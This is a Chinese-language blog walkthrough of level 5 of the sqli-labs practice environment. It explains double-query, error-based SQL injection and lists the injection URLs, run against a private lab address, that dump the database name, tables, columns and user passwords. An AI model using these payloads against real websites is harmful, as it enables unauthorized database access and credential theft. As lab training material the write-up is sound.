sql-lab 第五關
阿新 • • 發佈:2020-10-11
哎呦呦,到第五關了,天真的我以為,還與前幾關一樣的思路。
傻傻的來了一波盲注,都不成功。害,還是看了一手大佬的wp
還真不一樣,看這個題目都不一樣,Double Injection(雙查詢注入)。
我們先來了解一手二次查詢,說白了就是select巢狀查詢嘛,一個select裡面又巢狀著另一個查詢。巢狀的這個語句稱作子查詢。例如
select concat((select database()));
解釋一下,這個語句,先執行內部的再執行外面的。也就是說先執行一下select database(),然後再執行外面的這塊兒。
再搞第五關這個注入之前,我們還需要熟悉幾個函式:
1.count()彙總資料函式;
2.rand()隨機輸出一個大於0小於1的整數;
3 group by語句:也就是給你查詢出來的結果分組;
4 floor()取整
5 連線兩條語句
好,說那麼多,我們還是在題目裡找問題吧
開始注入,爆出資料庫:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20%20union%20select%20null,count(*),concat((select%20database()),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a--+
我第一次爆的時候不知是何原因沒顯示出來。等到我第三重新整理的時候就出來了。
接下來就要爆表名了:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
這是第一張表,接下來我們爆第二張
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
第三張表:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%202,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
第四張表:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%203,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
開始爆列名:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2012,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
第二列:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2013,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
這樣就爆出來了。
最後就是資料了,開始爆:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
這是第一個,接下來第二個密碼
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20password%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
終於全部都出來了。
再注入的時候,沒出來結果千萬不要急,一定要多試幾次,多重新整理重新整理,不要慌,爆的時候,畢竟需要緩衝時間的嘛。多重新整理重新整理。